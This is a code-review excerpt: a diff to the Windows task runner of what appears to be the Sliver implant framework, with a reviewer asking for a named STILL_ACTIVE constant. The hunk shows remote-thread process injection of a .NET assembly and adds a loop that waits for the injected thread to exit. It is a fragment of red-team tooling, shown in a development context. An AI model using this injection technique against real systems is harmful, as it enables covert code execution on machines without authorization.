sliver/taskrunner/task_windows.go

```diff
@@ -406,14 +417,29 @@ func ExecuteAssembly(hostingDll, assembly []byte, process, params string, timeou
 	}
 	// CreateRemoteThread(DLL addr + offset, assembly addr)
 	attr := new(syscall.SecurityAttributes)
-	_, _, err = createRemoteThread(handle, attr, 0, uintptr(hostingDllAddr+BobLoaderOffset), uintptr(assemblyAddr), 0)
+	threadHandle, _, err := createRemoteThread(handle, attr, 0, uintptr(hostingDllAddr+BobLoaderOffset), uintptr(assemblyAddr), 0)
 	if err != nil {
 		return "", err
 	}
 	// {{if .Debug}}
-	log.Printf("[*] RemoteThread started, now sleeping %d seconds...\n", timeout)
+	log.Printf("[*] RemoteThread started. Waiting for execution to finish.\n")
 	// {{end}}
-	time.Sleep(time.Duration(rand.Int31n(timeout)) * time.Second)
+	// time.Sleep(time.Duration(rand.Int31n(timeout)) * time.Second)
+	for {
+		code, err := getExitCodeThread(threadHandle)
+		// log.Println(code)
+		if err != nil && !strings.Contains(err.Error(), "operation completed successfully") {
+			// {{if .Debug}}
+			log.Printf("[-] Error when waiting for remote thread to exit: %s\n", err.Error())
+			// {{end}}
+			return "", err
+		}
+		if code == 259 {
```

Comment:
Let's use a `const STILL_ACTIVE = 259` at the top of the file, instead of hardcoding it here.